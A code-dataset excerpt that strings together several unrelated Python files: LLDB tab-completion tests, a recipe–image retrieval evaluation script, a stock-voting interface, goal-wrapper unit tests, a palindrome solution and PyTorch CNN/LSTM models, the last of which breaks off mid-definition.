"""Test that 'settings replace target.ru' completes to 'settings replace target.run-args'."""
self.complete_from_to(
'settings replace target.ru',
'settings replace target.run-args')
def test_settings_show_term(self):
self.complete_from_to(
'settings show term-',
'settings show term-width')
def test_settings_list_term(self):
self.complete_from_to(
'settings list term-',
'settings list term-width')
def test_settings_remove_term(self):
self.complete_from_to(
'settings remove term-',
'settings remove term-width')
def test_settings_s(self):
"""Test that 'settings s' completes to ['set', 'show']."""
self.complete_from_to(
'settings s', [
'set', 'show'])
def test_settings_set_th(self):
"""Test that 'settings set thread-f' completes to 'settings set thread-format'."""
self.complete_from_to('settings set thread-f', 'settings set thread-format')
def test_settings_s_dash(self):
"""Test that 'settings set --g' completes to 'settings set --global'."""
self.complete_from_to('settings set --g', 'settings set --global')
def test_settings_clear_th(self):
"""Test that 'settings clear thread-f' completes to 'settings clear thread-format'."""
self.complete_from_to(
'settings clear thread-f',
'settings clear thread-format')
def test_settings_set_ta(self):
"""Test that 'settings set ta' completes to 'settings set target.'."""
self.complete_from_to(
'settings set target.ma',
'settings set target.max-')
def test_settings_set_target_exec(self):
"""Test that 'settings set target.exec' completes to 'settings set target.exec-search-paths '."""
self.complete_from_to(
'settings set target.exec',
'settings set target.exec-search-paths')
def test_settings_set_target_pr(self):
"""Test that 'settings set target.pr' completes to [
'target.prefer-dynamic-value', 'target.process.']."""
self.complete_from_to('settings set target.pr',
['target.prefer-dynamic-value',
'target.process.'])
def test_settings_set_target_process(self):
"""Test that 'settings set target.process' completes to 'settings set target.process.'."""
self.complete_from_to(
'settings set target.process',
'settings set target.process.')
def test_settings_set_target_process_dot(self):
"""Test that 'settings set target.process.t' completes to 'settings set target.process.thread.'."""
self.complete_from_to(
'settings set target.process.t',
'settings set target.process.thread.')
def test_settings_set_target_process_thread_dot(self):
"""Test that 'settings set target.process.thread.' completes to [
'target.process.thread.step-avoid-regexp', 'target.process.thread.trace-thread']."""
self.complete_from_to('settings set target.process.thread.',
['target.process.thread.step-avoid-regexp',
'target.process.thread.trace-thread'])
def test_thread_plan_discard(self):
self.build()
(_, _, thread, _) = lldbutil.run_to_source_breakpoint(self,
'ptr_foo', lldb.SBFileSpec("main.cpp"))
self.assertTrue(thread)
self.complete_from_to('thread plan discard ', 'thread plan discard ')
source_path = os.path.join(self.getSourceDir(), "thread_plan_script.py")
self.runCmd("command script import '%s'"%(source_path))
self.runCmd("thread step-scripted -C thread_plan_script.PushPlanStack")
self.complete_from_to('thread plan discard ', 'thread plan discard 1')
self.runCmd('thread plan discard 1')
def test_target_space(self):
"""Test that 'target ' completes to ['create', 'delete', 'list',
'modules', 'select', 'stop-hook', 'variable']."""
self.complete_from_to('target ',
['create',
'delete',
'list',
'modules',
'select',
'stop-hook',
'variable'])
def test_target_modules_dump_line_table(self):
"""Tests source file completion by completing the line-table argument."""
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('target modules dump line-table main.cp',
['main.cpp'])
def test_target_modules_load_aout(self):
"""Tests modules completion by completing the target modules load argument."""
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('target modules load a.ou',
['a.out'])
def test_target_modules_search_paths_insert(self):
# Completion won't work without a valid target.
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert ")
self.build()
target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
self.assertTrue(target, VALID_TARGET)
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert ")
self.runCmd("target modules search-paths add a b")
self.complete_from_to("target modules search-paths insert ", "target modules search-paths insert 0")
# Completion only works for the first arg.
self.complete_from_to("target modules search-paths insert 0 ", "target modules search-paths insert 0 ")
def test_target_create_dash_co(self):
"""Test that 'target create --co' completes to 'target variable --core '."""
self.complete_from_to('target create --co', 'target create --core ')
def test_target_va(self):
"""Test that 'target va' completes to 'target variable '."""
self.complete_from_to('target va', 'target variable ')
def test_common_completion_thread_index(self):
subcommands = ['continue', 'info', 'exception', 'select',
'step-in', 'step-inst', 'step-inst-over', 'step-out', 'step-over', 'step-script']
# Completion should do nothing without threads.
for subcommand in subcommands:
self.complete_from_to('thread ' + subcommand + ' ',
'thread ' + subcommand + ' ')
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
# At least we have the thread at the index of 1 now.
for subcommand in subcommands:
self.complete_from_to('thread ' + subcommand + ' ', ['1'])
def test_common_completion_type_category_name(self):
subcommands = ['delete', 'list', 'enable', 'disable', 'define']
for subcommand in subcommands:
self.complete_from_to('type category ' + subcommand + ' ', ['default'])
self.complete_from_to('type filter add -w ', ['default'])
def test_command_argument_completion(self):
"""Test completion of command arguments"""
self.complete_from_to("watchpoint set variable -", ["-w", "-s"])
self.complete_from_to('watchpoint set variable -w', 'watchpoint set variable -w ')
self.complete_from_to("watchpoint set variable --", ["--watch", "--size"])
self.complete_from_to("watchpoint set variable --w", "watchpoint set variable --watch")
self.complete_from_to('watchpoint set variable -w ', ['read', 'write', 'read_write'])
self.complete_from_to("watchpoint set variable --watch ", ["read", "write", "read_write"])
self.complete_from_to("watchpoint set variable --watch w", "watchpoint set variable --watch write")
self.complete_from_to('watchpoint set variable -w read_', 'watchpoint set variable -w read_write')
# Now try the same thing with a variable name (non-option argument) to
# test that getopts arg reshuffling doesn't confuse us.
self.complete_from_to("watchpoint set variable foo -", ["-w", "-s"])
self.complete_from_to('watchpoint set variable foo -w', 'watchpoint set variable foo -w ')
self.complete_from_to("watchpoint set variable foo --", ["--watch", "--size"])
self.complete_from_to("watchpoint set variable foo --w", "watchpoint set variable foo --watch")
self.complete_from_to('watchpoint set variable foo -w ', ['read', 'write', 'read_write'])
self.complete_from_to("watchpoint set variable foo --watch ", ["read", "write", "read_write"])
self.complete_from_to("watchpoint set variable foo --watch w", "watchpoint set variable foo --watch write")
self.complete_from_to('watchpoint set variable foo -w read_', 'watchpoint set variable foo -w read_write')
def test_command_script_delete(self):
self.runCmd("command script add -h test_desc -f none -s current usercmd1")
self.check_completion_with_desc('command script delete ', [['usercmd1', 'test_desc']])
def test_command_delete(self):
self.runCmd(r"command regex test_command s/^$/finish/ 's/([0-9]+)/frame select %1/'")
self.complete_from_to('command delete test_c', 'command delete test_command')
def test_command_unalias(self):
self.complete_from_to('command unalias ima', 'command unalias image')
def test_completion_description_commands(self):
"""Test descriptions of top-level command completions"""
self.check_completion_with_desc("", [
["command", "Commands for managing custom LLDB commands."],
["breakpoint", "Commands for operating on breakpoints (see 'help b' for shorthand.)"]
])
self.check_completion_with_desc("pl", [
["platform", "Commands to manage and create platforms."],
["plugin", "Commands for managing LLDB plugins."]
])
# Just check that this doesn't crash.
self.check_completion_with_desc("comman", [])
self.check_completion_with_desc("non-existent-command", [])
def test_completion_description_command_options(self):
"""Test descriptions of command options"""
# Short options
self.check_completion_with_desc("breakpoint set -", [
["-h", "Set the breakpoint on exception catcH."],
["-w", "Set the breakpoint on exception throW."]
])
# Long options.
self.check_completion_with_desc("breakpoint set --", [
["--on-catch", "Set the breakpoint on exception catcH."],
["--on-throw", "Set the breakpoint on exception throW."]
])
# Ambiguous long options.
self.check_completion_with_desc("breakpoint set --on-", [
["--on-catch", "Set the breakpoint on exception catcH."],
["--on-throw", "Set the breakpoint on exception throW."]
])
# Unknown long option.
self.check_completion_with_desc("breakpoint set --Z", [
])
def test_common_completion_frame_index(self):
self.build()
lldbutil.run_to_source_breakpoint(self, '// Break here', lldb.SBFileSpec("main.cpp"))
self.complete_from_to('frame select ', ['0'])
self.complete_from_to('thread backtrace -s ', ['0'])
def test_frame_recognizer_delete(self):
self.runCmd("frame recognizer add -l py_class -s module_name -n recognizer_name")
self.check_completion_with_desc('frame recognizer delete ', [['0', 'py_class, module module_name, symbol recognizer_name']])
def test_platform_install_local_file(self):
self.complete_from_to('platform target-install main.cp', 'platform target-install main.cpp')
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24489")
def test_symbol_name(self):
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('breakpoint set -n Fo',
'breakpoint set -n Foo::Bar(int,\\ int)',
turn_off_re_match=True)
# No completion for Qu because the candidate is
# (anonymous namespace)::Quux().
self.complete_from_to('breakpoint set -n Qu', '')
def test_completion_type_formatter_delete(self):
self.runCmd('type filter add --child a Aoo')
self.complete_from_to('type filter delete ', ['Aoo'])
self.runCmd('type filter add --child b -x Boo')
self.complete_from_to('type filter delete ', ['Boo'])
self.runCmd('type format add -f hex Coo')
self.complete_from_to('type format delete ', ['Coo'])
self.runCmd('type format add -f hex -x Doo')
self.complete_from_to('type format delete ', ['Doo'])
self.runCmd('type summary add -c Eoo')
self.complete_from_to('type summary delete ', ['Eoo'])
self.runCmd('type summary add -x -c Foo')
self.complete_from_to('type summary delete ', ['Foo'])
self.runCmd('type synthetic add Goo -l test')
self.complete_from_to('type synthetic delete ', ['Goo'])
self.runCmd('type synthetic add -x Hoo -l test')
self.complete_from_to('type synthetic delete ', ['Hoo'])
@skipIf(archs=no_match(['x86_64']))
def test_register_read_and_write_on_x86(self):
"""Test the completion of the commands register read and write on x86"""
# The tab completion for "register read/write" won't work without a running process.
self.complete_from_to('register read ',
'register read ')
self.complete_from_to('register write ',
'register write ')
self.build()
self.main_source_spec = lldb.SBFileSpec("main.cpp")
lldbutil.run_to_source_breakpoint(self, '// Break here', self.main_source_spec)
# test cases for register read
self.complete_from_to('register read ',
['rax',
'rbx',
'rcx'])
self.complete_from_to('register read r',
['rax',
'rbx',
'rcx'])
self.complete_from_to('register read ra',
'register read rax')
# register read can take multiple register names as arguments
self.complete_from_to('register read rax ',
['rax',
'rbx',
'rcx'])
# complete with prefix '$'
self.completions_match('register read $rb',
['$rbx',
'$rbp'])
self.completions_match('register read $ra',
['$rax'])
self.complete_from_to('register read rax $',
['\$rax',
'\$rbx',
'\$rcx'])
self.complete_from_to('register read $rax ',
['rax',
'rbx',
'rcx'])
# test cases for register write
self.complete_from_to('register write ',
['rax',
'rbx',
'rcx'])
self.complete_from_to('register write r',
['rax',
'rbx',
'rcx'])
self.complete_from_to('register write ra',
'register write rax')
self.complete_from_to('register write rb',
['rbx',
'rbp'])
# register write can only take exact one register name as argument
self.complete_from_to('register write rbx ',
[])
def test_common_completion_target_stophook_ids(self):
subcommands = ['delete', 'enable', 'disable']
for subcommand in subcommands:
self.complete_from_to('target stop-hook ' + subcommand + ' ',
'target stop-hook ' + subcommand + ' ')
self.build()
self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.runCmd('target stop-hook add test DONE')
for subcommand in subcommands:
self.complete_from_to('target stop-hook ' + subcommand + ' ',
'target stop-hook ' + subcommand + ' 1')
# Completion should work only on the first argument.
for subcommand in subcommands:
self.complete_from_to('target stop-hook ' + subcommand + ' 1 ',
'target stop-hook ' + subcommand + ' 1 ')
def test_common_completion_type_language(self):
self.complete_from_to('type category -l ', ['c'])
def test_target_modules_load_dash_u(self):
self.build()
target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.complete_from_to('target modules load -u ', [target.GetModuleAtIndex(0).GetUUIDString()])
def test_complete_breakpoint_with_ids(self):
"""These breakpoint subcommands should be completed with a list of breakpoint ids"""
subcommands = ['enable', 'disable', 'delete', 'modify', 'name add', 'name delete', 'write']
# The tab completion here is unavailable without a target
for subcommand in subcommands:
self.complete_from_to('breakpoint ' + subcommand + ' ',
'breakpoint ' + subcommand + ' ')
self.build()
target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
self.assertTrue(target, VALID_TARGET)
bp = target.BreakpointCreateByName('main', 'a.out')
self.assertTrue(bp)
self.assertEqual(bp.GetNumLocations(), 1)
for subcommand in subcommands:
self.complete_from_to('breakpoint ' + subcommand + ' ',
['1'])
bp2 = target.BreakpointCreateByName('Bar', 'a.out')
self.assertTrue(bp2)
self.assertEqual(bp2.GetNumLocations(), 1)
for subcommand in subcommands:
self.complete_from_to('breakpoint ' + subcommand + ' ',
['1',
'2'])
for subcommand in subcommands:
self.complete_from_to('breakpoint ' + subcommand + ' 1 ',
['1',
'2'])
def test_complete_breakpoint_with_names(self):
self.build()
target = self.dbg.CreateTarget(self.getBuildArtifact('a.out'))
self.assertTrue(target, VALID_TARGET)
# test breakpoint read dedicated
self.complete_from_to('breakpoint read -N ', 'breakpoint read -N ')
self.complete_from_to('breakpoint read -f breakpoints.json -N ', ['mm'])
self.complete_from_to('breakpoint read -f breakpoints.json -N n', 'breakpoint read -f breakpoints.json -N n')
self.complete_from_to('breakpoint read -f breakpoints_invalid.json -N ', 'breakpoint read -f breakpoints_invalid.json -N ')
# test common breapoint name completion
bp1 = target.BreakpointCreateByName('main', 'a.out')
self.assertTrue(bp1)
self.assertEqual(bp1.GetNumLocations(), 1)
self.complete_from_to('breakpoint set -N n', 'breakpoint set -N n')
self.assertTrue(bp1.AddNameWithErrorHandling("nn"))
self.complete_from_to('breakpoint set -N ', 'breakpoint set -N nn')
|
[
"kontoshi0317@gmail.com"
] |
kontoshi0317@gmail.com
|
5913393d13501aaea1b1b337a3fd465a3da7f4a5
|
9fbc93493617fb4d5b1c18ee3771095928ac917a
|
/association_model_and_GAN/evaluate_cross_model.py
|
f1b2d49bdf65d850ab48404c782dd385d44624dc
|
[
"MIT"
] |
permissive
|
CorneliusHsiao/FoodMethodGAN
|
0883ab6e09ff71544f9d067ee3a0288646ca8c83
|
9e68dfabd48afe337ac95189a728dfdab075afe5
|
refs/heads/master
| 2020-09-04T08:51:35.506411
| 2019-12-26T10:57:44
| 2019-12-26T10:57:44
| 219,697,249
| 0
| 1
|
MIT
| 2019-12-06T04:54:00
| 2019-11-05T08:42:58
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,749
|
py
|
import os
import json
import numpy as np
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm import tqdm
from args import args
from networks import TextEncoder, ImageEncoder
from utils import transform, Dataset, rank
######################################################
# preprocess
######################################################
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
print('device:', device)
if device.__str__() == 'cpu':
args.batch_size = 16
with open(os.path.join(args.data_dir, 'ingrs2numV2.json'), 'r') as f:
ingrs_dict = json.load(f)
method_dict = {'baking': 0, 'frying':1, 'roasting':2, 'grilling':3,
'simmering':4, 'broiling':5, 'poaching':6, 'steaming':7,
'searing':8, 'stewing':9, 'braising':10, 'blanching':11}
for _ in method_dict.keys():
method_dict[_] += len(ingrs_dict)
in_dim = len(ingrs_dict) + len(method_dict)
######################################################
# dataset
######################################################
test_set = Dataset(
part='test',
data_dir=args.data_dir,
img_dir=args.img_dir,
ingrs_dict=ingrs_dict,
method_dict=method_dict,
transform=transform)
test_loader = DataLoader(
test_set, batch_size=args.batch_size, shuffle=True,
num_workers=args.workers, pin_memory=True)
print('test data:', len(test_set), len(test_loader))
######################################################
# model
######################################################
TxtEnc = TextEncoder(
data_dir=args.data_dir, in_dim=in_dim, hid_dim=args.hid_dim, z_dim=args.z_dim).to(device)
ImgEnc = ImageEncoder(z_dim=args.z_dim, ckpt_path=args.upmc_model).to(device)
TxtEnc.eval()
ImgEnc.eval()
ImgEnc = nn.DataParallel(ImgEnc)
assert args.resume != ''
print('load from ckpt: ', args.resume)
ckpt = torch.load(args.resume)
TxtEnc.load_state_dict(ckpt['weights_recipe'])
ImgEnc.load_state_dict(ckpt['weights_image'])
######################### evaluate ########################
print('Evaluating...')
imgs = []
rcps = []
for batch in tqdm(test_loader):
recipe = batch
recipe[0], recipe[1] = recipe[0].to(device), recipe[1].to(device)
with torch.no_grad():
txts_sub = TxtEnc(recipe[0])
imgs_sub = ImgEnc(recipe[1])
rcps.append(txts_sub.detach().cpu().numpy())
imgs.append(imgs_sub.detach().cpu().numpy())
rcps = np.concatenate(rcps, axis=0)
imgs = np.concatenate(imgs, axis=0)
for retrieved_type in ['recipe', 'image']:
for retrieved_range in [1000, 5000, 10000]:
print(retrieved_type, retrieved_range)
print('=> computing ranks...')
medR, medR_std, recalls = rank(rcps, imgs, retrieved_type, retrieved_range)
print('=> val MedR: {:.4f}({:.4f})'.format(medR, medR_std))
for k,v in recalls.items():
print('Recall@{}'.format(k), v)
"""
recipe 1000
=> computing ranks...
=> val MedR: 4.4000(0.4899)
Recall@1 0.26080000000000003
Recall@5 0.5485000000000001
Recall@10 0.6794
recipe 5000
=> computing ranks...
=> val MedR: 17.9000(0.5385)
Recall@1 0.11638
Recall@5 0.29918
Recall@10 0.40630000000000005
recipe 10000
=> computing ranks...
=> val MedR: 34.9000(0.8307)
Recall@1 0.07719000000000001
Recall@5 0.21172999999999997
Recall@10 0.3009799999999999
image 1000
=> computing ranks...
=> val MedR: 4.2000(0.4000)
Recall@1 0.27019999999999994
Recall@5 0.5561999999999999
Recall@10 0.6819000000000001
image 5000
=> computing ranks...
=> val MedR: 16.7000(0.7810)
Recall@1 0.12888
Recall@5 0.3148
Recall@10 0.4207199999999999
image 10000
=> computing ranks...
=> val MedR: 32.7000(1.1874)
Recall@1 0.08757
Recall@5 0.22885
Recall@10 0.31910000000000005
"""
|
[
"apple@appledeair-3.home"
] |
apple@appledeair-3.home
|
a304c942ed7c7626de03bb882fa1f3874e28c124
|
c9aa803d2aac3f68f8b7b43e1cb4b7eeeb808292
|
/framework/interface_expert.py
|
bb183a46ad71a0111191c8f58940e5f44731cd7b
|
[] |
no_license
|
JannisWolf/deep_q_learning_trader
|
6bc1e60aba61a82005025b0827746551ba1816ce
|
5daa9b7c28b884d261674a499455ea2face0776a
|
refs/heads/master
| 2022-11-25T07:59:41.659295
| 2020-05-17T12:15:39
| 2020-05-17T12:15:39
| 199,337,826
| 5
| 2
| null | 2022-11-21T21:31:56
| 2019-07-28T21:14:07
|
Python
|
UTF-8
|
Python
| false
| false
| 594
|
py
|
from abc import ABC, abstractmethod
from framework.stock_data import StockData
from framework.vote import Vote
class IExpert(ABC):
"""
Expert interface (abstract base class), that forces experts to have a vote method
"""
@abstractmethod
def vote(self, data: StockData) -> Vote:
"""
The expert votes on the stock of a company, given a company's historical stock data.
Args:
data: Historical stock data of a company
Returns:
A vote, which is either buy, hold, or sell
"""
pass
|
[
"jannis.wolf@fau.de"
] |
jannis.wolf@fau.de
|
0332f7b4ea3e1b6e128be195810588f7d85744a6
|
e2affa48dd79a57b06e6ef14900e4b527597fa25
|
/src/delegation_module_tests/goal_wrappers_unit_test.py
|
89d8966d91b834218b7e7d58c82018f45f9cba7d
|
[] |
no_license
|
ros-hybrid-behaviour-planner/delegation_module
|
0119983dc36f0d1ed81b362b79606695a081f99c
|
2b88fef67dacf2b46bc443ce8e66cdaec01e3e2c
|
refs/heads/master
| 2020-07-01T01:51:09.973767
| 2019-08-25T21:34:32
| 2019-08-25T21:34:32
| 201,012,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
"""
Unit tests for the GoalWrapper
@author: Mengers
"""
import unittest
from delegation_components.goal_wrappers import GoalWrapperBase
class GoalWrapper(GoalWrapperBase):
"""
Version of the GoalWrapper without abstract methods
"""
def get_goal_representation(self):
return
def send_goal(self, name):
self._created_goal = True
self._goal = name
return
def terminate_goal(self):
return
def check_if_still_alive(self):
return True
def check_goal_finished(self):
return True
class TestGoalWrapper(unittest.TestCase):
"""
Unit tests for the base functionality of the GoalWrapperBase
"""
def test_base_functions(self):
"""
Tests base functionality
"""
test_name = "Test"
test_goal = "test_goal"
uut = GoalWrapper(name=test_name)
self.assertEqual(test_name, uut.goal_name)
self.assertFalse(uut.goal_is_created())
self.assertRaises(RuntimeError, uut.get_goal)
uut.send_goal(name=test_goal)
self.assertTrue(uut.goal_is_created())
self.assertEqual(uut.get_goal(), test_goal)
|
[
"v.mengers@campus.tu-berlin.de"
] |
v.mengers@campus.tu-berlin.de
|
d6d0d58f05ad22c9474ef9804ec088549a68f841
|
5b6b2018ab45cc4710cc5146040bb917fbce985f
|
/200_longest-palindromic-substring/longest-palindromic-substring.py
|
60710ba54ef2ad0d3d20d4f30fd1db4aec65a148
|
[] |
no_license
|
ultimate010/codes_and_notes
|
6d7c7d42dcfd84354e6fcb5a2c65c6029353a328
|
30aaa34cb1c840f7cf4e0f1345240ac88b8cb45c
|
refs/heads/master
| 2021-01-11T06:56:11.401869
| 2016-10-30T13:46:39
| 2016-10-30T13:46:39
| 72,351,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,016
|
py
|
# coding:utf-8
'''
@Copyright:LintCode
@Author: ultimate010
@Problem: http://www.lintcode.com/problem/longest-palindromic-substring
@Language: Python
@Datetime: 16-06-28 14:08
'''
class Solution:
# @param {string} s input string
# @return {string} the longest palindromic substring
def longestPalindrome(self, s):
# Write your code here
n = len(s)
if n <= 1:
return s
m = 1
ret = ''
for i in range(1, 2*n): # at least 2 char
if i & 1 == 1: # odd
t = i / 2
j = t
else: # even
t = i / 2 - 1
j = t + 1
while t >= 0 and j < n and s[t] == s[j]:
t -= 1
j += 1
# print t, j
if t == i:
pass # one char
else:
if j - t - 1 > m:
m = j - t - 1
ret = s[t + 1: j]
return ret
|
[
"ultimate010@gmail.com"
] |
ultimate010@gmail.com
|
dd2e5c7bb3b8cf73d47ad7e62b333762de574f25
|
7a7b8dc77ce5f1a59270fb6d262e354f998175f5
|
/old_contrib/v2/my_models.py
|
29561edb0331873edf23b6889734b36d63eb8bb1
|
[] |
no_license
|
ismail0T/CE7454_project
|
2b8f686f4e631293d0206b4edd62cadbd2d676b7
|
d4c247d06633dcbd95c99fd00a83693103636a22
|
refs/heads/master
| 2020-08-01T22:40:29.072696
| 2019-11-17T03:53:37
| 2019-11-17T03:53:37
| 211,141,219
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,052
|
py
|
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
from tcn import TemporalConvNet
class ConvSimple(nn.Module):
def __init__(self):
super(ConvSimple, self).__init__()
self.n_classes = 5
self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=3)
self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=3)
self.pool1 = nn.AvgPool1d(2, stride=6)
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
self.pool2 = nn.AvgPool1d(2, stride=2)
self.conv5 = nn.Conv1d(64, 256, kernel_size=3, padding=1)
self.conv6 = nn.Conv1d(256, 256, kernel_size=3, padding=1)
self.pool_avg = nn.AvgPool1d(2)
self.linear1 = nn.Linear(3328, 128)
self.dropout1 = nn.Dropout(0.2)
# LL2: 128 --> classes
self.linear2 = nn.Linear(128, self.n_classes)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.pool1(x)
x = self.dropout1(x)
x = self.conv3(x)
x = F.relu(x)
x = self.conv4(x)
x = F.relu(x)
x = self.pool2(x)
x = self.dropout1(x)
x = self.conv5(x)
x = F.relu(x)
x = self.conv6(x)
x = F.relu(x)
x = self.pool_avg(x)
x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
x = self.linear1(x)
xx = F.relu(x)
x = self.dropout1(xx)
x = self.linear2(x)
return x, xx
class ConvLSTM01(nn.Module):
def __init__(self, bi_dir):
super(ConvLSTM01, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
# CL1: 28 x 28 --> 64 x 3'000
self.conv1 = nn.Conv1d(1, 16, kernel_size=10, padding=1, stride=2)
# MP1: 64 x 3'000 --> 64 x 1'500
self.pool1 = nn.MaxPool1d(2, stride=4)
# CL2: 64 x 1'500 --> 64 x 1'500
self.conv2 = nn.Conv1d(16, 32, kernel_size=3, padding=1)
# MP2: 64 x 1'500 --> 64 x 750
self.pool2 = nn.MaxPool1d(2)
# CL3: 64 x 750 --> 64 x 750
self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
self.to_pad = 1
# MP3: 64 x 750 --> 64 x 375
self.pool3 = nn.MaxPool1d(2, padding=self.to_pad)
self.linear1 = nn.Linear(6016, 256)
self.dropout1 = nn.Dropout(0.5)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 256
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
def forward(self, x, h_init, c_init):
# print(x.shape)
# CL1: 1 x 3'000 --> 64 x 3'000
x = self.conv1(x)
x = F.relu(x)
# print(x.shape)
# MP1: 64 x 3'000 --> 64 x 1'500
x = self.pool1(x)
# print(x.shape)
x = self.dropout1(x)
# CL2: 64 x 1'500 --> 64 x 1'500
x = self.conv2(x)
x = F.relu(x)
# print(x.shape)
# MP2: 64 x 1'500 --> 64 x 750
x = self.pool2(x)
# print(x.shape)
# CL3: 64 x 750 --> 64 x 750
x = self.conv3(x)
x = F.relu(x)
# print(x.shape)
x = self.dropout1(x)
# MP3: 64 x 376 = 24'064
x = self.pool3(x)
# print(x.shape)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
x = self.linear1(x)
x = F.relu(x)
# Droput
x = self.dropout1(x)
cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = cnn_x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout1(lstm_out)
# linear
cnn_lstm_out = self.hidden2label1(lstm_out) # activations are implicit
# output
scores = cnn_lstm_out
return scores, h_final, c_final
class ConvLSTM00(nn.Module):
def __init__(self, bi_dir):
super(ConvLSTM00, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
self.bi_dir = bi_dir
self.conv1 = nn.Conv1d(1, 64, kernel_size=50, padding=1, stride=6)
self.pool1 = nn.MaxPool1d(1, stride=8)
self.dropout1 = nn.Dropout(0.5)
self.conv2 = nn.Conv1d(64, 128, kernel_size=8, padding=1, stride=1)
self.conv3 = nn.Conv1d(128, 128, kernel_size=8, padding=1, stride=1)
self.conv4 = nn.Conv1d(128, 128, kernel_size=8, padding=1, stride=1)
self.pool2 = nn.MaxPool1d(1, stride=4)
self.conv1_2 = nn.Conv1d(1, 64, kernel_size=400, padding=1, stride=50)
self.pool1_2 = nn.MaxPool1d(1, stride=4)
self.dropout1_2 = nn.Dropout(0.5)
self.conv2_2 = nn.Conv1d(64, 128, kernel_size=6, padding=1, stride=1)
self.conv3_2 = nn.Conv1d(128, 128, kernel_size=6, padding=1, stride=1)
self.conv4_2 = nn.Conv1d(128, 128, kernel_size=6, padding=1, stride=1)
self.pool2_2 = nn.MaxPool1d(1, stride=2)
self.linear1 = nn.Linear(1920, 128)
# self.dropout1 = nn.Dropout(0.4)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 1920
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim, bidirectional=self.bi_dir)
# linear
self.hidden2label1 = nn.Linear(self.hidden_dim * (1 + int(self.bi_dir)), self.n_classes)
def forward(self, x, h_init, c_init):
out_time = self.conv1(x)
out_time = F.relu(out_time)
out_time = self.pool1(out_time)
out_time = self.dropout1(out_time)
out_time = self.conv2(out_time)
out_time = F.relu(out_time)
out_time = self.conv3(out_time)
out_time = F.relu(out_time)
out_time = self.conv4(out_time)
out_time = F.relu(out_time)
out_time = self.pool2(out_time)
out_freq = self.conv1_2(x)
out_freq = F.relu(out_freq)
out_freq = self.pool1_2(out_freq)
out_freq = self.dropout1_2(out_freq)
out_freq = self.conv2_2(out_freq)
out_freq = F.relu(out_freq)
out_freq = self.conv3_2(out_freq)
out_freq = F.relu(out_freq)
out_freq = self.conv4_2(out_freq)
out_freq = F.relu(out_freq)
out_freq = self.pool2_2(out_freq)
x = torch.cat((out_time, out_freq), 2)
x = self.dropout1(x)
x = x.reshape(x.size(0), x.size(1) * x.size(2))
# print(x.shape) # 24'064
# x = self.linear1(x)
# x = F.relu(x)
#
# # Droput
# x = self.dropout1(x)
cnn_x = F.relu(x)
# print('cnn_x', cnn_x.shape)
# LSTM
g_seq = cnn_x.unsqueeze(dim=1)
# print('g_seq', g_seq.shape)
lstm_out, (h_final, c_final) = self.lstm(g_seq, (h_init, c_init))
# Droput
lstm_out = self.dropout2(lstm_out)
# linear
cnn_lstm_out = self.hidden2label1(lstm_out) # activations are implicit
# output
scores = cnn_lstm_out
return scores, h_final, c_final
class Seq2Seq11(nn.Module):
def __init__(self):
super(Seq2Seq11, self).__init__()
self.n_classes = 5
self.hidden_dim = 256
# self.conv1 = nn.Conv1d(1, 32, kernel_size=10, padding=1, stride=2)
# self.conv2 = nn.Conv1d(32, 32, kernel_size=10, padding=1, stride=2)
# self.pool1 = nn.MaxPool1d(2, stride=4)
#
# self.conv3 = nn.Conv1d(32, 64, kernel_size=3, padding=1)
# self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
# self.pool2 = nn.MaxPool1d(2, stride=2)
#
# # self.conv4 = nn.Conv1d(64, 64, kernel_size=3, padding=1)
# # self.pool3 = nn.MaxPool1d(2, stride=1)
#
# self.linear1 = nn.Linear(576, 128)
self.dropout1 = nn.Dropout(0.4)
self.dropout2 = nn.Dropout(0.7)
# LL2: 128 --> classes
# self.linear2 = nn.Linear(128, self.n_classes)
# LSTM
self.lstm_in_dim = 3000
self.lstm = nn.LSTM(self.lstm_in_dim, self.hidden_dim)
# linear
